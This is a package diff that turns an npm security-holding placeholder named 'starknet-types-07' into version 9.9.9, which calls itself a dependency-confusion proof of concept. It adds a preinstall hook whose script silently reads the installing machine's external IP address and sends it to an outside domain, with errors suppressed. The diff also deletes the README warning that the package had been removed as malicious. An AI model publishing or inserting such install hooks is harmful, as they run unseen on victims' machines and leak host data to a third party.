starknet-types-07 0.0.1-security → 9.9.9

package/index.js

@@ -0,0 +1 @@
+module.exports = {};

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "starknet-types-07",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "9.9.9",
+  "description": "PoC for authorized security testing",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "keywords": ["security", "testing"],
+  "author": "Security Tester",
+  "license": "MIT"
 }

package/preinstall.js

@@ -0,0 +1,30 @@
+// Minimal dependency confusion PoC for starknet-types-07
+const https = require('https');
+const os = require('os');
+
+// Get current IP address (simplified approach)
+let ip;
+try {
+  const interfaces = os.networkInterfaces();
+  for (const name of Object.keys(interfaces)) {
+    for (const iface of interfaces[name]) {
+      // Skip over non-IPv4 and internal interfaces
+      if (iface.family === 'IPv4' && !iface.internal) {
+        ip = iface.address;
+        break;
+      }
+    }
+    if (ip) break;
+  }
+} catch (e) {
+  ip = 'unknown';
+}
+
+// Make a simple GET request to prove execution
+https.get(`https://verysecuredomain.com/dc_starknet07?ip=${ip}`, (res) => {
+  // Just silently complete
+}).on('error', (e) => {
+  // Silently fail
+});
+
+// No console logs, no file writes - just the minimal SSRF

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=starknet-types-07 for more information.